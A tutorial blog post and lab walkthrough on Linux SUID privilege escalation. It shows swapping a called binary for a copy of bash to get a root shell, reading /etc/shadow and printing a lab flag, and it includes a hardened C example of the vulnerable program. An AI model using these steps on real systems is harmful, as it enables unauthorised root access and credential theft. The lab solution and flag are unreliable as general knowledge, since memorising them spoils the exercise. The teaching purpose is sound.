Exploiting SUID Binaries

Posted by r3kind1e on November 3, 2022

In addition to the three main file access permissions (read, write and execute), Linux also provides users with specialized permissions that can be utilized in specific situations. One of these access permissions is the SUID (Set Owner User ID) permission.

When applied, this permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary.

SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions. It is to be noted, however, that the elevated privileges are limited to the execution of that script or binary and do not amount to a general elevation of the user's privileges. If the binary or script is improperly configured, however, unprivileged users can exploit misconfigurations or vulnerabilities within it to obtain an elevated session.

This is the functionality that we will be attempting to exploit in order to elevate our privileges; the success of our attack, however, will depend on the following factors:

  • Owner of the SUID binary - Given that we are attempting to elevate our privileges, we will only be exploiting SUID binaries that are owned by the “root” user or other privileged users.

  • Access permissions - We will require executable permissions in order to execute the SUID binary.

I want you to think of a binary on Linux that allows standard users to execute specific commands with root privileges. One of these binaries is the sudo binary. The sudo binary allows users to execute specific commands with root privileges; of course, they need to provide their password and they need to be part of the sudo group. That particular binary is owned by the root user, and it is an SUID binary, in that it allows unprivileged users to execute that specific binary with elevated privileges.

Demo: Exploiting SUID Binaries

student@attackdefense:~$ whoami
student
student@attackdefense:~$ groups student
student : student
student@attackdefense:~$ pwd
/home/student
student@attackdefense:~$ ls -al
-r-x------ 1 root root 8296 Sep 22 2018 greetings
-rwsr-xr-x 1 root root 8344 Sep 22 2018 welcome

welcome is owned by the root user, and we can execute this particular binary: every other user account and group on the system can execute it as well. If you pay attention to the s in the owner permissions, that is the SUID permission. The other binaries here do not have the s permission applied, so the SUID permission has been applied only to this particular binary, which means it is executed with root privileges.

student@attackdefense:~$ ./greetings
bash: ./greetings: Permission denied
student@attackdefense:~$ ./welcome
Welcome to Attack Defense Labs

Let's learn more about this particular welcome binary; the way we can do that is by utilizing the type or file command.

student@attackdefense:~$ file welcome
welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped

It tells us that this is a standard ELF binary for Linux, shows the interpreter /lib64/ld-linux-x86-64.so.2, and tells us the binary is dynamically linked, i.e. it loads shared objects at run time. That is another alternative when it comes down to exploiting SUID binaries: if you can find a shared object that the binary tries to load but cannot find, you can create your own shared object and get the binary to load it. That shared object would be malicious in nature, or would execute commands that elevate your session.

But in this case, this particular binary doesn’t have any missing shared objects.

Let's try to identify what strings we can find within the binary. The strings command will give us a list of the printable strings within the binary. This is just basic static analysis.

student@attackdefense:~$ strings welcome
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
...
greetings

Let's start from the beginning. It loads the dynamic linker and then libc, and you can see setuid. It also references greetings: it is calling upon an external binary. What if we create or modify the greetings binary and have it execute a command like bash, or have it be the bash binary itself? Because this particular welcome binary is executed with root privileges (it is an SUID binary), it will execute the command specified within the greetings binary with those privileges.

And we can actually get rid of the current greetings binary here.

student@attackdefense:~$ rm greetings

We can create our own greetings binary. We create a copy of bash and we’re going to save it as greetings. This is essentially a bash binary, but it’s called greetings.

student@attackdefense:~$ cp /bin/bash greetings
student@attackdefense:~$ ls
greetings welcome

Because the welcome binary calls upon the greetings binary, it will execute bash with root privileges, which will consequently provide us with a root bash session.

It executes the greetings binary, which is in essence just a bash binary, and we immediately obtain root privileges. If I run id, we currently have access as the root user.

student@attackdefense:~$ ./welcome
root@attackdefense:~# id
uid=0(root) gid=999(student) groups=999(student)
root@attackdefense:~# whoami
root
root@attackdefense:~# cat /etc/shadow

We have successfully been able to elevate our privileges through the use of an SUID binary.
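What a setuid program like welcome should have done instead, as an added example that is not the lab's source. welcome.c is not shown on the page, so the first function is only a sketch consistent with the strings output (setuid, system, greetings); the check and hardened function that follow refuse to run anything that is not an absolute path to a root-owned, write-protected file inside a root-owned, write-protected directory, which is exactly the condition /home/student/greetings fails. The install path /usr/local/libexec/greetings is hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Sketch of the vulnerable shape (welcome.c itself is not on the page):
 * raise privileges, then hand a bare program name to system(), so whatever
 * "greetings" resolves to in the caller's environment runs as root. */
int vulnerable_welcome(void) {
    if (setuid(0) != 0) return 1;
    puts("Welcome to Attack Defense Labs");
    return system("greetings");
}

/* Returns 1 only if `path` is something a privileged program may safely
 * execute: absolute, a regular file, owned by root, not group/other
 * writable, and located in a directory that is itself root-owned and not
 * group/other writable. /home/student/greetings fails the last test. */
int is_trusted_executable(const char *path) {
    struct stat st, dst;
    char dir[4096];
    if (path[0] != '/' || strlen(path) >= sizeof dir) return 0;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH))) return 0;
    strcpy(dir, path);                 /* parent directory of path */
    char *slash = strrchr(dir, '/');
    if (slash == dir) slash[1] = '\0'; else *slash = '\0';
    if (stat(dir, &dst) != 0 || !S_ISDIR(dst.st_mode)) return 0;
    if (dst.st_uid != 0 || (dst.st_mode & (S_IWGRP | S_IWOTH))) return 0;
    return 1;
}

/* Hardened shape: fixed absolute path (hypothetical install location),
 * verified first, then execve() with a minimal environment, no shell. */
int hardened_welcome(void) {
    const char *target = "/usr/local/libexec/greetings";
    char *const argv[] = { "greetings", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    puts("Welcome to Attack Defense Labs");
    if (!is_trusted_executable(target)) {
        fprintf(stderr, "refusing to run %s: not a root-owned, write-protected file\n", target);
        return 1;
    }
    execve(target, argv, envp);
    perror("execve");
    return 1;
}

int main(void) { return hardened_welcome(); }
```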

There are multiple misconfigurations that you can look for. One of them is to identify missing shared objects that the SUID binary tries to load and create your own shared object in their place. Once the binary is executed, it will find the shared object that it could not find before and execute the malicious commands you placed within that shared object file, consequently providing you with elevated privileges.

Exploiting Setuid Programs

Vulnerable setuid programs on Linux systems could lead to privilege escalation attacks. In this lab, you are provided a regular user account and need to escalate your privileges to become root. There are 2 programs in your home directory, welcome and greetings, which might be vulnerable.

Your mission:

  1. Get a root shell on the system
  2. View /etc/shadow
  3. Retrieve the flag.

Note: Development tools, e.g. gcc, are installed on the system already.

student@attackdefense:~$ whoami
student
student@attackdefense:~$ groups student
student : student
student@attackdefense:~$ ls -al
total 36
drwxr-xr-x 1 student student 4096 Sep 22  2018 .
drwxr-xr-x 1 root    root    4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root      88 Sep 22  2018 .bashrc
-r-x------ 1 root    root    8296 Sep 22  2018 greetings
-rwsr-xr-x 1 root    root    8344 Sep 22  2018 welcome
student@attackdefense:~$ cat greetings
cat: greetings: Permission denied
student@attackdefense:~$ ./welcome
Welcome to Attack Defense Labs
student@attackdefense:~$ file welcome
welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped
student@attackdefense:~$ strings welcome
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
greetings
;*3$"
GCC: (Ubuntu 7.3.0-16ubuntu3) 7.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7696
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
welcome.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
student@attackdefense:~$ rm greetings
rm: remove write-protected regular file 'greetings'? y
student@attackdefense:~$ cp /bin/bash greetings
student@attackdefense:~$ ls -al
total 1116
drwxr-xr-x 1 student student    4096 Nov  3 13:52 .
drwxr-xr-x 1 root    root       4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root         88 Sep 22  2018 .bashrc
-rwxr-xr-x 1 student student 1113504 Nov  3 13:52 greetings
-rwsr-xr-x 1 root    root       8344 Sep 22  2018 welcome
student@attackdefense:~$ ./welcome
root@attackdefense:~# whoami
root
root@attackdefense:~# cat /etc/shadow
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
bin:*:17764:0:99999:7:::
sys:*:17764:0:99999:7:::
sync:*:17764:0:99999:7:::
games:*:17764:0:99999:7:::
man:*:17764:0:99999:7:::
lp:*:17764:0:99999:7:::
mail:*:17764:0:99999:7:::
news:*:17764:0:99999:7:::
uucp:*:17764:0:99999:7:::
proxy:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
backup:*:17764:0:99999:7:::
list:*:17764:0:99999:7:::
irc:*:17764:0:99999:7:::
gnats:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17796::::::
root@attackdefense:~# find / -name flag
find: '/proc/tty/driver': Permission denied
find: '/proc/1/map_files': Permission denied
find: '/proc/7/map_files': Permission denied
find: '/proc/9/map_files': Permission denied
find: '/proc/26/map_files': Permission denied
/root/flag
root@attackdefense:~# cat /root/flag
b92bcdc876d52108778e2d81f3b01494